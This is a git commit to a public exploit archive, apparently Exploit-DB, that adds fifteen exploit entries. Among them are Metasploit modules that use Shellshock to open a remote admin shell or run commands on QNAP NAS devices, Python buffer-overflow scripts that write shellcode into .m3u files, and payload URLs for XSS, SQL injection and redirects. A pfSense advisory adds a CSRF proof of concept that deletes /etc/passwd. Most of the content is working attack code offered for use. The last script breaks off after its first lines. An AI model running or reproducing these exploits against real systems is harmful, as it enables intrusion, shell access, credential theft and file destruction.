DB: 2015-03-27
15 new exploits
This commit is contained in:
parent
3ab5d7365a
commit
0078b8567a
16 changed files with 576 additions and 0 deletions
15
files.csv
15
files.csv
|
@ -32909,3 +32909,18 @@ id,file,description,date,author,platform,type,port
|
|||
36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 'ddb' Parameter Cross Site Scripting Vulnerability",2012-01-04,"Jonathan Claudius",php,webapps,0
|
||||
36490,platforms/php/webapps/36490.py,"WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin)",2015-03-25,"Claudio Viviani",php,webapps,0
|
||||
36491,platforms/windows/remote/36491.txt,"Adobe Flash Player Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0
|
||||
36492,platforms/php/webapps/36492.txt,"GraphicsClone Script 'term' parameter Cross-Site Scripting Vulnerability",2012-01-04,Mr.PaPaRoSSe,php,webapps,0
|
||||
36493,platforms/php/webapps/36493.txt,"Orchard 1.3.9 'ReturnUrl' Parameter URI Redirection Vulnerability",2012-01-04,"Mesut Timur",php,webapps,0
|
||||
36494,platforms/php/webapps/36494.txt,"Limny 3.0.1 'login.php' Script Cross Site Scripting Vulnerability",2012-01-04,"Gjoko Krstic",php,webapps,0
|
||||
36495,platforms/php/webapps/36495.txt,"Pligg CMS 1.1.2 'status' Parameter SQL Injection Vulnerability",2011-12-29,SiteWatch,php,webapps,0
|
||||
36496,platforms/php/webapps/36496.txt,"Pligg CMS 1.1.4 'SERVER[php_self]' Cross Site Scripting Vulnerability",2011-12-29,SiteWatch,php,webapps,0
|
||||
36497,platforms/php/webapps/36497.txt,"UBB.threads 7.5.6 'Username' Field Cross Site Scripting Vulnerability",2012-01-04,sonyy,php,webapps,0
|
||||
36498,platforms/php/webapps/36498.txt,"Yaws 1.88 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-01-05,SiteWatch,php,webapps,0
|
||||
36499,platforms/php/webapps/36499.txt,"StatIt 4 'statistik.php' Multiple Cross Site Scripting Vulnerabilities",2012-01-04,sonyy,php,webapps,0
|
||||
36500,platforms/windows/remote/36500.txt,"HServer 0.1.1 Directory Traversal Vulnerability",2012-01-05,demonalex,windows,remote,0
|
||||
36501,platforms/windows/local/36501.py,"Mini-stream Ripper v2.7.7.100 Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0
|
||||
36502,platforms/windows/local/36502.py,"RM Downloader 2.7.5.400 Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0
|
||||
36503,platforms/hardware/remote/36503.rb,"QNAP admin shell via Bash Environment Variable Code Injection",2015-03-26,"Patrick Pellegrino",hardware,remote,9993
|
||||
36504,platforms/hardware/remote/36504.rb,"QNAP Web Server Remote Code Execution via Bash Environment Variable Code Injection",2015-03-26,"Patrick Pellegrino",hardware,remote,0
|
||||
36505,platforms/windows/remote/36505.txt,"WebGate eDVR Manager Stack Buffer Overflow",2015-03-26,"Praveen Darshanam",windows,remote,0
|
||||
36506,platforms/php/webapps/36506.txt,"pfSense 2.2 - Multiple Vulnerabilities",2015-03-26,"High-Tech Bridge SA",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
119
platforms/hardware/remote/36503.rb
Executable file
119
platforms/hardware/remote/36503.rb
Executable file
|
@ -0,0 +1,119 @@
|
|||
# Exploit Title: QNAP admin shell via Bash Environment Variable Code Injection
|
||||
# Date: 7 February 2015
|
||||
# Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
|
||||
# Employer homepage: http://www.securegroup.it
|
||||
# Vendor homepage: http://www.qnap.com
|
||||
# Version: All Turbo NAS models except TS-100, TS-101, TS-200
|
||||
# Tested on: TS-1279U-RP
|
||||
# CVE : 2014-6271
|
||||
# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61
|
||||
|
||||
|
||||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/d3vpp/metasploit-modules
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'net/telnet'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::CommandShell
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'QNAP admin shell via Bash Environment Variable Code Injection',
|
||||
'Description' => %q{
|
||||
This module allows you to spawn a remote admin shell (utelnetd) on a QNAP device via Bash Environment Variable Code Injection.
|
||||
Affected products:
|
||||
All Turbo NAS models except TS-100, TS-101, TS-200
|
||||
},
|
||||
'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [
|
||||
['CVE', '2014-6271'], #aka ShellShock
|
||||
['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']
|
||||
],
|
||||
'Platform' => ['unix']
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']),
|
||||
OptPort.new('LTELNET', [true, 'Set the remote port where the utelnetd service will be listening','9993'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path),
|
||||
'agent' => "() { :;}; echo; /usr/bin/id"
|
||||
})
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
|
||||
vprint_error("Connection failed")
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
if !res
|
||||
return Exploit::CheckCode::Unknown
|
||||
elsif res.code== 302 and res.body.include? 'uid'
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
|
||||
def exploit_telnet()
|
||||
telnetport = datastore['LTELNET']
|
||||
|
||||
print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}")
|
||||
|
||||
print_status("#{rhost}:#{rport} - Sending exploit")
|
||||
begin
|
||||
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
|
||||
|
||||
if sock
|
||||
print_good("#{rhost}:#{rport} - Backdoor service spawned")
|
||||
add_socket(sock)
|
||||
else
|
||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service not spawned")
|
||||
end
|
||||
|
||||
print_status "Starting a Telnet session #{rhost}:#{telnetport}"
|
||||
merge_me = {
|
||||
'USERPASS_FILE' => nil,
|
||||
'USER_FILE' => nil,
|
||||
'PASS_FILE' => nil,
|
||||
'USERNAME' => nil,
|
||||
'PASSWORD' => nil
|
||||
}
|
||||
start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
|
||||
rescue
|
||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service not handled")
|
||||
end
|
||||
return
|
||||
end
|
||||
|
||||
def run
|
||||
begin
|
||||
telnetport = datastore['LTELNET']
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path),
|
||||
'agent' => "() { :;}; /bin/utelnetd -l/bin/sh -p#{telnetport} &"
|
||||
})
|
||||
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
|
||||
Rex::HostUnreachable => e
|
||||
fail_with(Failure::Unreachable, e)
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
exploit_telnet()
|
||||
|
||||
end
|
||||
|
||||
end
|
85
platforms/hardware/remote/36504.rb
Executable file
85
platforms/hardware/remote/36504.rb
Executable file
|
@ -0,0 +1,85 @@
|
|||
# Exploit Title: QNAP Web server remote code execution via Bash Environment Variable Code Injection
|
||||
# Date: 7 February 2015
|
||||
# Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
|
||||
# Employer homepage: http://www.securegroup.it
|
||||
# Vendor homepage: http://www.qnap.com
|
||||
# Version: All Turbo NAS models except TS-100, TS-101, TS-200
|
||||
# Tested on: TS-1279U-RP
|
||||
# CVE : 2014-6271
|
||||
# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61
|
||||
|
||||
|
||||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/d3vpp/metasploit-modules
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'QNAP Web server remote code execution via Bash Environment Variable Code Injection',
|
||||
'Description' => %q{
|
||||
This module allows you to inject unix command with the same user who runs the http service - admin - directly on the QNAP system.
|
||||
Affected products:
|
||||
All Turbo NAS models except TS-100, TS-101, TS-200
|
||||
},
|
||||
'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [
|
||||
['CVE', '2014-6271'], #aka ShellShock
|
||||
['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']
|
||||
],
|
||||
'Platform' => ['unix']
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']),
|
||||
OptString.new('CMD', [ true, 'The command to run', '/bin/cat /etc/passwd'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path),
|
||||
'agent' => "() { :;}; echo; /usr/bin/id"
|
||||
})
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
|
||||
vprint_error("Connection failed")
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
if !res
|
||||
return Exploit::CheckCode::Unknown
|
||||
elsif res.code== 302 and res.body.include? 'uid'
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path),
|
||||
'agent' => "() { :;}; echo; #{datastore['CMD']}"
|
||||
})
|
||||
|
||||
if res.body.empty?
|
||||
print_error("No data found.")
|
||||
elsif res.code== 302
|
||||
print_status("#{rhost}:#{rport} - bash env variable injected")
|
||||
puts " "
|
||||
print_line(res.body)
|
||||
end
|
||||
end
|
||||
|
||||
end
|
7
platforms/php/webapps/36492.txt
Executable file
7
platforms/php/webapps/36492.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/51258/info
|
||||
|
||||
GraphicsClone Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
http://www.example.com/search/?term=<script>alert(document.cookie)</script>
|
9
platforms/php/webapps/36493.txt
Executable file
9
platforms/php/webapps/36493.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/51260/info
|
||||
|
||||
Orchard is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
|
||||
|
||||
A successful exploit may aid in phishing attacks; other attacks are possible.
|
||||
|
||||
Orchard 1.3.9 is vulnerable; other versions may be affected.
|
||||
|
||||
http://www.example.com/orchard/Users/Account/LogOff?ReturnUrl=%2f%2fwww.netsparker.com%3f
|
9
platforms/php/webapps/36494.txt
Executable file
9
platforms/php/webapps/36494.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/51261/info
|
||||
|
||||
Limny is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Limny 3.0.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/admin/login.php/"/><script>alert('zsl')</script>
|
9
platforms/php/webapps/36495.txt
Executable file
9
platforms/php/webapps/36495.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/51273/info
|
||||
|
||||
Pligg CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
Pligg CMS 1.1.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/Audits/CMS/pligg_1.1.2/search.php?adv=1&status='and+sleep(9)or+sleep(9)or+1%3D' &search=on&advancesearch= Search+&sgroup=on&stags=0&slink=on&scategory=on&scomments=0&suser=0
|
9
platforms/php/webapps/36496.txt
Executable file
9
platforms/php/webapps/36496.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/51274/info
|
||||
|
||||
Pligg CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Pligg CMS 1.1.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/demo/search/')%7B%7Dalert('xss');if('
|
15
platforms/php/webapps/36497.txt
Executable file
15
platforms/php/webapps/36497.txt
Executable file
|
@ -0,0 +1,15 @@
|
|||
source: http://www.securityfocus.com/bid/51275/info
|
||||
|
||||
UBB.threads is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
UBB.threads 7.5.6 is vulnerable; other versions may also be affected.
|
||||
|
||||
The following exploit data is available:
|
||||
|
||||
http://www.example.com/forums/ubbthreads.php/ubb/login/lostpw/1
|
||||
|
||||
POST /forums/ubbthreads.php
|
||||
ubb=start_page&Loginname=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&Email=&buttforgot=I+forgot+my+password
|
||||
|
12
platforms/php/webapps/36498.txt
Executable file
12
platforms/php/webapps/36498.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
source: http://www.securityfocus.com/bid/51276/info
|
||||
|
||||
Yaws is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
|
||||
|
||||
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are possible.
|
||||
|
||||
Yaws 1.88 is vulnerable; other versions may be affected.
|
||||
|
||||
http://www.example.com/editTag.yaws?node=ALockedPage&tag=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
|
||||
http://www.example.com/showOldPage.yaws?node=home&index=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
|
||||
http://www.example.com/allRefsToMe.yaws?node=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
|
||||
http://www.example.com/editPage.yaws?node=home
|
16
platforms/php/webapps/36499.txt
Executable file
16
platforms/php/webapps/36499.txt
Executable file
|
@ -0,0 +1,16 @@
|
|||
source: http://www.securityfocus.com/bid/51280/info
|
||||
|
||||
StatIt is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
StatIt 4 is vulnerable; other versions may be affected.
|
||||
|
||||
The following example URIs are available:
|
||||
|
||||
http://www.example.com/statit4/statistik.php?st_id=1&action=stat_last%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&enc=333263120212292&agent=ari/534.30&PHPSESSID=14d0f57363caf5ef2d7fb1b56238dace&PHPSESSID=14d0f57363caf5ef2d7fb1b56238dace
|
||||
|
||||
http://www.example.com/statit4/statistik.php?action=stat_tld&st_id=1&show=more%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E\&PHPSESSID=d8679fc904017bdf6b09f5d88f7cf979
|
||||
|
||||
http://www.example.com/statit4/statistik.php?action=stat_abfragen&st_id=1&show=more&order=2%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&sort=1&PHPSESSID=698bf9d1e988e3af70022f1dfb86fd33
|
||||
|
105
platforms/php/webapps/36506.txt
Executable file
105
platforms/php/webapps/36506.txt
Executable file
|
@ -0,0 +1,105 @@
|
|||
Advisory ID: HTB23251
|
||||
Product: pfSense
|
||||
Vendor: Electric Sheep Fencing LLC
|
||||
Vulnerable Version(s): 2.2 and probably prior
|
||||
Tested Version: 2.2
|
||||
Advisory Publication: March 4, 2015 [without technical details]
|
||||
Vendor Notification: March 4, 2015
|
||||
Vendor Patch: March 5, 2015
|
||||
Public Disclosure: March 25, 2015
|
||||
Vulnerability Type: Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352]
|
||||
CVE References: CVE-2015-2294, CVE-2015-2295
|
||||
Risk Level: Medium
|
||||
CVSSv2 Base Scores: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N), 5.4 (AV:N/AC:H/Au:N/C:N/I:N/A:C)
|
||||
Solution Status: Fixed by Vendor
|
||||
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
|
||||
|
||||
-----------------------------------------------------------------------------------------------
|
||||
|
||||
Advisory Details:
|
||||
|
||||
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in web interface of pfSense, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of pfSense and delete arbitrary files via CSRF (Cross-Site Request Forgery) attacks.
|
||||
|
||||
Successful exploitation of the vulnerabilities may allow an attacker to delete arbitrary files on the system with root privileges, steal administrator’s cookies and gain complete control over the web application and even the entire system, as pfSense is running with root privileges and allows OS command execution via its web interface.
|
||||
|
||||
|
||||
1) Multiple XSS vulnerabilities in pfSense: CVE-2015-2294
|
||||
|
||||
1.1 Input passed via the "zone" HTTP GET parameter to "/status_captiveportal.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
|
||||
|
||||
PoC code below uses JS "alert()" function to display "ImmuniWeb" popup:
|
||||
|
||||
https://[host]/status_captiveportal.php?zone=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
|
||||
|
||||
1.2 Input passed via the "if" and "dragtable" HTTP GET parameters to "/firewall_rules.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
|
||||
|
||||
Below are two PoC codes for each vulnerable parameter that use JS "alert()" function to display "ImmuniWeb" popup:
|
||||
|
||||
https://[host]/firewall_rules.php?undodrag=1&dragtable=&if=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
|
||||
|
||||
https://[host]/firewall_rules.php?if=wan&undodrag=1&dragtable%5B%5D=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
|
||||
|
||||
1.3 Input passed via the "queue" HTTP GET parameter to "/firewall_shaper.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
|
||||
|
||||
PoC code below uses JS "alert()" function to display "ImmuniWeb" popup:
|
||||
|
||||
https://[host]/firewall_shaper.php?interface=wan&action=add&queue=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
|
||||
|
||||
1.4 Input passed via the "id" HTTP GET parameter to "/services_unbound_acls.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
|
||||
|
||||
PoC code below uses JS "alert()" function to display "ImmuniWeb" popup:
|
||||
|
||||
https://[host]/services_unbound_acls.php?act=edit&id=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
|
||||
|
||||
1.5 Input passed via the "filterlogentries_time", "filterlogentries_sourceipaddress", "filterlogentries_sourceport", "filterlogentries_destinationipaddress", "filterlogentries_interfaces", "filterlogentries_destinationport", "filterlogentries_protocolflags" and "filterlogentries_qty" HTTP GET parameters to "/diag_logs_filter.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
|
||||
|
||||
Below are eight PoC codes for each vulnerable parameter that use JS "alert()" function to display "ImmuniWeb" popup:
|
||||
|
||||
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_time=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
|
||||
|
||||
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_sourceipaddress=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
|
||||
|
||||
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_sourceport=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
|
||||
|
||||
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_destinationipaddress=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
|
||||
|
||||
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_interfaces=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
|
||||
|
||||
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_destinationport=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
|
||||
|
||||
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_protocolflags=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
|
||||
|
||||
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_qty=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
|
||||
|
||||
|
||||
2) Cross-Site Request Forgery (CSRF) in pfSense: CVE-2015-2295
|
||||
|
||||
2.1 The vulnerability exists due to insufficient validation of the HTTP request origin in "/system_firmware_restorefullbackup.php" script. A remote attacker can trick a log-in administrator to visit a malicious page with CSRF exploit and delete arbitrary files on the target system with root privileges.
|
||||
|
||||
The following PoC code deletes file "/etc/passwd":
|
||||
|
||||
https://[host]/system_firmware_restorefullbackup.php?deletefile=../etc/passwd
|
||||
|
||||
|
||||
-----------------------------------------------------------------------------------------------
|
||||
|
||||
Solution:
|
||||
|
||||
Update to pfSense 2.2.1
|
||||
|
||||
More Information:
|
||||
https://blog.pfsense.org/?p=1661
|
||||
|
||||
-----------------------------------------------------------------------------------------------
|
||||
|
||||
References:
|
||||
|
||||
[1] High-Tech Bridge Advisory HTB23251 - https://www.htbridge.com/advisory/HTB23251 - Arbitrary file deletion and multiple XSS vulnerabilities in pfSense.
|
||||
[2] pfSense - https://www.pfsense.org - The pfSense® project is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface.
|
||||
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
|
||||
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
|
||||
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
|
||||
|
||||
-----------------------------------------------------------------------------------------------
|
||||
|
||||
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
|
34
platforms/windows/local/36501.py
Executable file
34
platforms/windows/local/36501.py
Executable file
|
@ -0,0 +1,34 @@
|
|||
#!/usr/bin/env python
|
||||
#[+] Author: TUNISIAN CYBER
|
||||
#[+] Exploit Title: Mini-sream Ripper v2.7.7.100 Local Buffer Overflow
|
||||
#[+] Date: 25-03-2015
|
||||
#[+] Type: Local Exploits
|
||||
#[+] Tested on: WinXp/Windows 7 Pro
|
||||
#[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/43/Mini-streamRipper.exe?token=1427334864_8d9c5d7d948871f54ae14ed9304d1ddf&fileName=Mini-streamRipper.exe
|
||||
#[+] Friendly Sites: sec4ever.com
|
||||
#[+] Twitter: @TCYB3R
|
||||
#[+] Original POC:
|
||||
# http://www.exploit-db.com/exploits/11197/
|
||||
#POC:
|
||||
#IMG1:
|
||||
#http://i.imgur.com/ifXYgwx.png
|
||||
#IMG2:
|
||||
#http://i.imgur.com/ZMisj6R.png
|
||||
from struct import pack
|
||||
file="crack.m3u"
|
||||
junk="\x41"*35032
|
||||
eip=pack('<I',0x7C9D30D7)
|
||||
junk2="\x44"*4
|
||||
#Messagebox Shellcode (113 bytes) - Any Windows Version By Giuseppe D'Amore
|
||||
#http://www.exploit-db.com/exploits/28996/
|
||||
shellcode= ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
|
||||
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
|
||||
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
|
||||
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
|
||||
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
|
||||
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
|
||||
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
|
||||
"\x49\x0b\x31\xc0\x51\x50\xff\xd7")
|
||||
writeFile = open (file, "w")
|
||||
writeFile.write(junk+eip+junk2+shellcode)
|
||||
writeFile.close()
|
32
platforms/windows/local/36502.py
Executable file
32
platforms/windows/local/36502.py
Executable file
|
@ -0,0 +1,32 @@
|
|||
#!/usr/bin/env python
|
||||
#[+] Author: TUNISIAN CYBER
|
||||
#[+] Exploit Title: RM Downloader v2.7.5.400 Local Buffer Overflow
|
||||
#[+] Date: 25-03-2015
|
||||
#[+] Type: Local Exploits
|
||||
#[+] Tested on: WinXp/Windows 7 Pro
|
||||
#[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/49/Mini-streamRM-MP3Converter.exe?token=1427318981_98f71d0e10e2e3bd2e730179341feb0a&fileName=Mini-streamRM-MP3Converter.exe
|
||||
#[+] Friendly Sites: sec4ever.com
|
||||
#[+] Twitter: @TCYB3R
|
||||
#[+] Related Vulnerability/ies:
|
||||
# http://www.exploit-db.com/exploits/8628/
|
||||
#POC:
|
||||
#IMG1:
|
||||
#http://i.imgur.com/87sXIj8.png
|
||||
from struct import pack
|
||||
